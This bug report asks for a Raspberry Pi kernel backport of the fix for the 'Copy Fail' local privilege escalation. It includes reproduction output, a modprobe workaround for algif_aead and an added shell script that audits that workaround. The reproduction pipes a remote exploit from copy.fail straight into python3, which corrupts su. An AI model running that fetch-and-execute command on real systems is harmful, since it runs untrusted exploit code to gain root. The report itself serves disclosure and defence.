Describe the bug
Summary
The RPi 6.12.x kernel tree does not appear to have backported the fix for CVE-2026-31431 ("Copy Fail"), a local privilege escalation via a logic flaw in algif_aead + splice(). The mainline fix is commit a664bf3d603d.
Steps to reproduce the behaviour
Reproduction
Using the published PoC from https://copy.fail/:
pi@pibox:~ $ curl https://copy.fail/exp | python3 && su
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 731 0 731 0 0 2456 0 --:--:-- --:--:-- --:--:-- 2486
sh: 1: su: Exec format error
-bash: /usr/bin/su: cannot execute binary file: Exec format error
The page-cache write primitive succeeds (confirmed by su being corrupted), but privilege escalation fails because the dropped payload is x86_64, not aarch64. An attacker with an ARM64-compiled payload would likely succeed.
After reboot, su is restored normally:
pi@pibox:~ $ su --version
su from util-linux 2.41
Kernel module state
algif_aead is present as a loadable module (not built-in):
pi@pibox:~ $ modinfo algif_aead
filename: /lib/modules/6.12.75+rpt-rpi-v8/kernel/crypto/algif_aead.ko.xz
description: AEAD kernel crypto API user space interface
author: Stephan Mueller <smueller@chronox.de>
license: GPL
srcversion: 1D887535877F443CB443712
depends: af_alg,crypto_null
intree: Y
name: algif_aead
vermagic: 6.12.75+rpt-rpi-v8 SMP preempt mod_unload modversions aarch64
Workaround
Blocking algif_aead via modprobe prevents the exploit from acquiring its write primitive:
echo "install algif_aead /bin/false" | sudo tee /etc/modprobe.d/disable-algif.conf
sudo rmmod algif_aead
sudo reboot
Post-mitigation, the exploit fails cleanly before touching su:
pi@pibox:~ $ curl https://copy.fail/exp | python3 && su
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 731 0 731 0 0 2385 0 --:--:-- --:--:-- --:--:-- 2381
Traceback (most recent call last):
File "<stdin>", line 9, in <module>
File "<stdin>", line 5, in c
FileNotFoundError: [Errno 2] No such file or directory
pi@pibox:~ $ su --version
su from util-linux 2.41
Request
Please backport mainline commit a664bf3d603d to the RPi 6.12.x kernel tree.
References:
Device (s)
Raspberry Pi 4 Mod. B
System
- Kernel:
6.12.75+rpt-rpi-v8
- OS:
Raspberry Pi reference 2025-12-04
- Firmware version:
version ce768004a1c9657e60b33b0cc413d8e07320cb0d (clean) (release) (start)
Logs
No response
Additional context
No response
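An added example, not part of the original report or the Raspberry Pi kernel tree: a shell audit of the workaround above. It reports whether the `install algif_aead /bin/false` rule is on disk, whether the module is still loaded, and whether the module is built in. The function names and the four status words are assumptions made for this sketch; paths are parameters so the logic can be run against constructed files.

```shell
#!/bin/sh
# Added example: audit the algif_aead workaround described in this report.
# Defaults point at the live system; pass other paths to test on sample files.

# 0 if CONF_DIR/*.conf holds an active "install algif_aead /bin/false" (or
# /bin/true) rule. modprobe treats '-' and '_' in module names as equivalent.
install_rule_present() {
    grep -Eqs '^[[:space:]]*install[[:space:]]+algif[-_]aead[[:space:]]+(/usr)?/bin/(false|true)([[:space:]]|$)' "$1"/*.conf
}

# 0 if algif_aead is currently loaded (first column of /proc/modules).
module_loaded() {
    grep -Eqs '^algif_aead[[:space:]]' "$1"
}

# 0 if algif_aead is compiled into the kernel, where a modprobe rule has no effect.
module_builtin() {
    grep -Eqs '/algif_aead\.ko$' "$1"
}

# Prints one of: builtin, exposed, blocked-but-loaded, mitigated
algif_aead_status() {
    conf_dir=$1
    proc_modules=$2
    builtin_list=$3
    if module_builtin "$builtin_list"; then
        echo builtin
    elif ! install_rule_present "$conf_dir"; then
        echo exposed
    elif module_loaded "$proc_modules"; then
        echo blocked-but-loaded   # rule written, but rmmod/reboot not done yet
    else
        echo mitigated
    fi
}

algif_aead_status "${1:-/etc/modprobe.d}" "${2:-/proc/modules}" \
    "${3:-/lib/modules/$(uname -r)/modules.builtin}"
```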